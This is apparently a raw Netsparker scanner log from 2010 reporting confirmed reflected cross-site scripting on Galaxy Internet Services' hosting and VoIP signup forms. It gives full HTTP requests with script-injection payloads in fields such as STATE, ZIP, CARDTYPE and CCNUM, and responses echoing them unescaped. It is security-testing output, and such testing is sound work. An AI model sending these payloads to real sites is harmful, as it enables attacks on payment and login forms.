<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Economy Hosting"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x00072A)</script>"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="3"> <B>Account Type:<BR> 3, 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 
CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST Economy Hosting
CITY POST 3
DOMAIN POST 3
EMAIL POST netsparker@example.com
NAME POST Ronald Smith
PHONE POST 3
STATE POST '"--><script>alert(0x00074F)</script>
STREET POST 3
ZIP POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 178
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=Economy+Hosting&CITY=3&DOMAIN=3&EMAIL=netsparker%40example.com&NAME=Ronald+Smith&PHONE=3&STATE='%22--%3e%3cscript%3enetsparker(0x00074F)%3c%2fscript%3e&STREET=3&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:48 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Economy Hosting"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x00074F)</script>"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="3"> <B>Account Type:<BR> 3, 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 </SELECT> <P> </SELECT> <P> <TABLE BORDER=0 
CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST Economy Hosting
CITY POST 3
DOMAIN POST 3
EMAIL POST netsparker@example.com
NAME POST Ronald Smith
PHONE POST 3
STATE POST 3
STREET POST '"--><script>alert(0x000752)</script>
ZIP POST 3

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 178
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=Economy+Hosting&CITY=3&DOMAIN=3&EMAIL=netsparker%40example.com&NAME=Ronald+Smith&PHONE=3&STATE=3&STREET='%22--%3e%3cscript%3enetsparker(0x000752)%3c%2fscript%3e&ZIP=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:51 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Economy Hosting"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x000752)</script>"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="3"> <B>Account Type:<BR> 3, '"--><script>netsparker(0x000752)</script></B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 
</SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /webhosts/webhost_c2.cgi

/webhosts/webhost_c2.cgi CONFIRMED

https://secure.gis.net/webhosts/webhost_c2.cgi

Parameters

Parameter Type Value
ACCOUNTTYPE POST Economy Hosting
CITY POST 3
DOMAIN POST 3
EMAIL POST netsparker@example.com
NAME POST Ronald Smith
PHONE POST 3
STATE POST 3
STREET POST 3
ZIP POST '"--><script>alert(0x000755)</script>

Request

POST /webhosts/webhost_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/webhosts/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 178
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

ACCOUNTTYPE=Economy+Hosting&CITY=3&DOMAIN=3&EMAIL=netsparker%40example.com&NAME=Ronald+Smith&PHONE=3&STATE=3&STREET=3&ZIP='%22--%3e%3cscript%3enetsparker(0x000755)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:28:53 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><HTML><HEAD><TITLE>Galaxy Internet Services | Signup Online</TITLE></HEAD><BODY BACKGROUND="../images/bg1.gif" MARGINHEIGHT="0" MARGINWIDTH="0" LEFTMARGIN=0 TOPMARGIN=0><TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0><TD><A HREF="http://www.gis.net/index.html"><IMG BORDER=0 SRC="../images/logobar.gif" WIDTH=610 HEIGHT=62 ALT="Welcome To Galaxy Internet Services"></A></TD> <TR><TD><TABLE CELLPADDING=5 CELLSPACING=0 BORDER=0><TD WIDTH=459 VALIGN=TOP> <CENTER> <TABLE><TD WIDTH=430> <FONT SIZE=+1 FACE="VERDANA, ARIAL, HELVETICA">WEB HOSTING</FONT><BR> </TD></TABLE> <!-- ITEMS --> <TABLE BORDER=0 WIDTH=435 CELLPADDING=2><TD BGCOLOR="#000066"> <FONT COLOR="#FFFFFF" SIZE="-2" FACE="VERDANA, ARIAL, HELVETICA"> <B>ENTER BILLING AND ACCOUNT INFO</B> </FONT></TD></TABLE> <TABLE><TD WIDTH=420> <FONT FACE="VERDANA, ARIAL, HELVETICA" SIZE=-1> <FORM METHOD="POST" ACTION="webhost2_c2.cgi"><INPUT NAME="NAME" TYPE="HIDDEN" VALUE="Economy Hosting"><INPUT NAME="EMAIL" TYPE="HIDDEN" VALUE="3"><INPUT NAME="STREET" TYPE="HIDDEN" VALUE="3"><INPUT NAME="CITY" TYPE="HIDDEN" VALUE="netsparker@example.com"><INPUT NAME="STATE" TYPE="HIDDEN" VALUE="Ronald+Smith"><INPUT NAME="ZIP" TYPE="HIDDEN" VALUE="3"><INPUT NAME="PHONE" TYPE="HIDDEN" VALUE="3"><INPUT NAME="DOMAIN" TYPE="HIDDEN" VALUE="3"><INPUT NAME="TYPE" TYPE="HIDDEN" VALUE="'"--><script>netsparker(0x000755)</script>"> <B>Account Type:<BR> '"--><script>netsparker(0x000755)</script>, 3</B><P> Credit Card Type:<BR> <SELECT NAME="CARDTYPE"> <OPTION>MasterCard <OPTION>Visa <OPTION>American Express </SELECT> <P> Credit Card Number:<BR> <INPUT TYPE="TEXT" NAME="NAME" SIZE=16 MAXLENGTH=16><P> Credit Card Expiration Date:<BR> <SELECT NAME=EXPMONTH"> <OPTION> <OPTION>01 <OPTION>02 <OPTION>03 <OPTION>04 <OPTION>05 <OPTION>06 <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 </SELECT> / <SELECT NAME="EXPYEAR"> <OPTION> <OPTION>07 <OPTION>08 <OPTION>09 <OPTION>10 <OPTION>11 <OPTION>12 <OPTION>13 <OPTION>14 
</SELECT> <P> </SELECT> <P> <TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0><TD> <FONT SIZE=-1> Login Name:<BR> <INPUT TYPE="TEXT" NAME="LOGIN" SIZE=8 MAXLENGTH=8> </TD><TD></FONT> &nbsp &nbsp <FONT SIZE=-1> Password:<BR></FONT> &nbsp &nbsp <INPUT TYPE="PASSWORD" NAME="PASSWD" SIZE=8 MAXLENGTH=12> </TD></TABLE> <FONT SIZE=-2>Your login name must be 2 - 8 characters, numbers or letters, all lower case. The login name and password are used to upload your website and may also be used as a mailbox. </FONT> <P> Mother's Maiden Name:<BR> <INPUT TYPE="TEXT" NAME="MAIDENNAME" SIZE=20> <P> <INPUT TYPE=SUBMIT VALUE="Next -->"> </FORM> </FONT> </TD></TABLE> <P> <HR NOSHADE SIZE=1 WIDTH=400> <FONT SIZE=-2> Copyright 1999, Galaxy Internet Services<BR></FONT> </CENTER> </FONT> <P> </TD><TD WIDTH=135 VALIGN=TOP> <!-- SIDEBAR --> <P> </TD></TABLE></TD></TABLE></BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
FIRSTNAME POST Ronald Smith
LASTNAME POST Ronald Smith
COMPANY POST 3
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
EMAIL POST netsparker@example.com
BILLINGSTREET POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGZIP POST 3
SOURCE POST 3
INTERNETTYPE POST 3
REQUESTEDSTATE POST 3
RATECENTER POST 3
CARDTYPE POST '"--><script>alert(0x000ABA)</script>
CCNUM POST 3
EXPMONTH POST 3
EXPYEAR POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
tosagree POST agree
Free_Service POST Free_VOIP_Service
ACCOUNTTYPE POST Region 1 Business Unlimited
monthlytotal0 POST 0.00
monthlytotal1 POST 0.00
monthlytotal2 POST 0.00
monthlytotal3 POST 0.00
monthlytotal4 POST 0.00
monthlytotal POST 0.00
Activation_Fee POST Activation_Fee
PHONETYPE POST I Will Provide My Own SIP Compatible Phone
onetimetotal0 POST 0
onetimetotal2 POST 0
pcphone POST 0.00
onetimetotal3 POST 0.00
onetimetotal POST 24.95
COMMENTS POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 742
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

FIRSTNAME=Ronald+Smith&LASTNAME=Ronald+Smith&COMPANY=3&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&EMAIL=netsparker%40example.com&BILLINGSTREET=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGZIP=3&SOURCE=3&INTERNETTYPE=3&REQUESTEDSTATE=3&RATECENTER=3&CARDTYPE='%22--%3e%3cscript%3enetsparker(0x000ABA)%3c%2fscript%3e&CCNUM=3&EXPMONTH=3&EXPYEAR=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&tosagree=agree&Free_Service=Free_VOIP_Service&ACCOUNTTYPE=Region+1+Business+Unlimited&monthlytotal0=0.00&monthlytotal1=0.00&monthlytotal2=0.00&monthlytotal3=0.00&monthlytotal4=0.00&monthlytotal=0.00&Activation_Fee=Activation_Fee&PHONETYPE=I+Will+Provide+My+Own+SIP+Compatible+Phone&onetimetotal0=0&onetimetotal2=0&pcphone=0.00&onetimetotal3=0.00&onetimetotal=24.95&COMMENTS=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:46:47 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: '"--><script>netsparker(0x000ABA)</script> <P>3<P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
FIRSTNAME POST Ronald Smith
LASTNAME POST Ronald Smith
COMPANY POST 3
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
EMAIL POST netsparker@example.com
BILLINGSTREET POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGZIP POST 3
SOURCE POST 3
INTERNETTYPE POST 3
REQUESTEDSTATE POST 3
RATECENTER POST 3
CARDTYPE POST MC
CCNUM POST '"--><script>alert(0x000ABB)</script>
EXPMONTH POST 3
EXPYEAR POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
tosagree POST agree
Free_Service POST Free_VOIP_Service
ACCOUNTTYPE POST Region 1 Business Unlimited
monthlytotal0 POST 0.00
monthlytotal1 POST 0.00
monthlytotal2 POST 0.00
monthlytotal3 POST 0.00
monthlytotal4 POST 0.00
monthlytotal POST 0.00
Activation_Fee POST Activation_Fee
PHONETYPE POST I Will Provide My Own SIP Compatible Phone
onetimetotal0 POST 0
onetimetotal2 POST 0
pcphone POST 0.00
onetimetotal3 POST 0.00
onetimetotal POST 24.95
COMMENTS POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 743
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

FIRSTNAME=Ronald+Smith&LASTNAME=Ronald+Smith&COMPANY=3&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&EMAIL=netsparker%40example.com&BILLINGSTREET=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGZIP=3&SOURCE=3&INTERNETTYPE=3&REQUESTEDSTATE=3&RATECENTER=3&CARDTYPE=MC&CCNUM='%22--%3e%3cscript%3enetsparker(0x000ABB)%3c%2fscript%3e&EXPMONTH=3&EXPYEAR=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&tosagree=agree&Free_Service=Free_VOIP_Service&ACCOUNTTYPE=Region+1+Business+Unlimited&monthlytotal0=0.00&monthlytotal1=0.00&monthlytotal2=0.00&monthlytotal3=0.00&monthlytotal4=0.00&monthlytotal=0.00&Activation_Fee=Activation_Fee&PHONETYPE=I+Will+Provide+My+Own+SIP+Compatible+Phone&onetimetotal0=0&onetimetotal2=0&pcphone=0.00&onetimetotal3=0.00&onetimetotal=24.95&COMMENTS=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 02:46:49 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: MC <P>'"><script>netsparker(0x000ABB)</script><P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
FIRSTNAME POST Ronald Smith
LASTNAME POST Ronald Smith
COMPANY POST 3
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
EMAIL POST netsparker@example.com
BILLINGSTREET POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGZIP POST 3
SOURCE POST 3
INTERNETTYPE POST 3
REQUESTEDSTATE POST 3
CCNUM POST '"--><script>alert(0x000DC6)</script>
EXPMONTH POST 3
EXPYEAR POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
Free_Service POST Free_VOIP_Service
ACCOUNTTYPE POST Free
monthlytotal0 POST 0.00
monthlytotal1 POST 0.00
monthlytotal2 POST 0.00
monthlytotal3 POST 0.00
monthlytotal4 POST 0.00
monthlytotal POST 0.00
Activation_Fee POST Activation_Fee
onetimetotal0 POST 0
PHONETYPE POST I Will Provide My Own SIP Compatible Phone
onetimetotal2 POST 0
onetimetotal3 POST 0.00
onetimetotal POST 24.95
COMMENTS POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 667
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

FIRSTNAME=Ronald+Smith&LASTNAME=Ronald+Smith&COMPANY=3&STREET=3&CITY=3&STATE=3&ZIP=3&PHONE=3&EMAIL=netsparker%40example.com&BILLINGSTREET=3&BILLINGCITY=3&BILLINGSTATE=3&BILLINGZIP=3&SOURCE=3&INTERNETTYPE=3&REQUESTEDSTATE=3&CCNUM='%22--%3e%3cscript%3enetsparker(0x000DC6)%3c%2fscript%3e&EXPMONTH=3&EXPYEAR=3&NAMEONCARD=Ronald+Smith&OFFERCODE=3&Free_Service=Free_VOIP_Service&ACCOUNTTYPE=Free&monthlytotal0=0.00&monthlytotal1=0.00&monthlytotal2=0.00&monthlytotal3=0.00&monthlytotal4=0.00&monthlytotal=0.00&Activation_Fee=Activation_Fee&onetimetotal0=0&PHONETYPE=I+Will+Provide+My+Own+SIP+Compatible+Phone&onetimetotal2=0&onetimetotal3=0.00&onetimetotal=24.95&COMMENTS=3

Response

HTTP/1.0 200 OK
Date: Sat, 25 Sep 2010 03:02:59 GMT
Server: Apache
Connection: close
Content-Type: text/html


<HTML><BODY BGCOLOR="#FFFFFF"><CENTER><BR><BR><B><FONT COLOR="RED">SORRY - THE CARD NUMBER YOU ENTERED IS INVALID</B><p>Type: <P>'"><script>netsparker(0x000DC6)</script><P></FONT><P><B>PLEASE GO BACK AND ENTER A CORRECT CARD NUMBER.</BODY></HTML>
- /voip/voip_c2.cgi

/voip/voip_c2.cgi CONFIRMED

https://secure.gis.net/voip/voip_c2.cgi

Parameters

Parameter Type Value
FIRSTNAME POST Ronald Smith
LASTNAME POST Ronald Smith
COMPANY POST 3
STREET POST 3
CITY POST 3
STATE POST 3
ZIP POST 3
PHONE POST 3
EMAIL POST netsparker@example.com
BILLINGSTREET POST 3
BILLINGCITY POST 3
BILLINGSTATE POST 3
BILLINGZIP POST 3
SOURCE POST 3
INTERNETTYPE POST 3
REQUESTEDSTATE POST 3
CARDTYPE POST '"--><script>alert(0x00109E)</script>
CCNUM POST 3
EXPMONTH POST 3
EXPYEAR POST 3
NAMEONCARD POST Ronald Smith
OFFERCODE POST 3
tosagree POST agree
monthlytotal0 POST 0.00
monthlytotal1 POST 0.00
monthlytotal2 POST 0.00
monthlytotal3 POST 0.00
ACCOUNTTYPE POST Region 1 Business Unlimited
monthlytotal4 POST 39.95
monthlytotal POST 39.95
Activation_Fee POST Activation_Fee
onetimetotal0 POST 0
PHONETYPE POST I Will Provide My Own SIP Compatible Phone
onetimetotal2 POST 0
pcphone POST 0.00
onetimetotal3 POST 0.00
onetimetotal POST 24.95
COMMENTS POST 3

Request

POST /voip/voip_c2.cgi HTTP/1.1
Referer: https://secure.gis.net/voip/free.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.gis.net
Content-Length: 700
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

